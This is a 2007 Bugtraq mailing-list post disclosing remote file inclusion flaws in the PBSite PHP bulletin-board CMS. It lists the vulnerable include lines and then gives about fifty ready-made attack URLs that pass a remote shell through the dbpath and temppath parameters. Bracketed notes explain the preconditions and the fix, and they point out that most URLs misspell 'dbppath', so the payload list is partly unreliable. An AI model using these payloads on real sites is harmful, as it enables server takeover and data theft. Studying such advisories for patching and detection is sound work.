Date: Sat, 02 Jun 2007 14:17:12 +0300
From: "pito pito" <the-modest-pirate@...mail.com>
To: bugtraq@...urityfocus.com
Cc: secalert@...urityreason.com
Subject: PBSite - PHP Bulletin Site | CMS ====> RFI


                     _ _ _ _
                   .-"      "-.
                  /            \
                 |   TiTaNiC   |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
        )_/        \  HaCkEr  /
       (@


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
script:PBSite - PHP Bulletin Site | CMS ====> RFI

url:http://sourceforge.net/project/showfiles.php?group_id=88114

author:titanichacker (the-modest-pirate@...mail.com)

contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
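bug in:   %%%
(note: each include below builds its path from $dbpath, $temppath, $template or $language. The report implies these variables are not set before the include, so the path is request-controlled only where PHP populates globals from the request (register_globals on); a remote target additionally needs URL includes enabled (allow_url_fopen / allow_url_include). Setting the base paths inside the script before any include, and checking $language / $template against a fixed list, closes the issue.)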
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./pmpshow.php

include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%
./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php

include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
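exploit:%%
(note: the variable used in the includes above is $dbpath; "dbppath" in most of the URLs below appears to be a misspelling of that name, so log searches and filter rules should match dbpath= and temppath=.)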
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]
%%%%%
http://victim/path/sendpm.php?dbppath=[shell]
%%%%%%%
http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbppath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbppath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%%
http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbppath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%
thanx
%%%%%%%%%
         cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & 
milw0rm & xp10
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

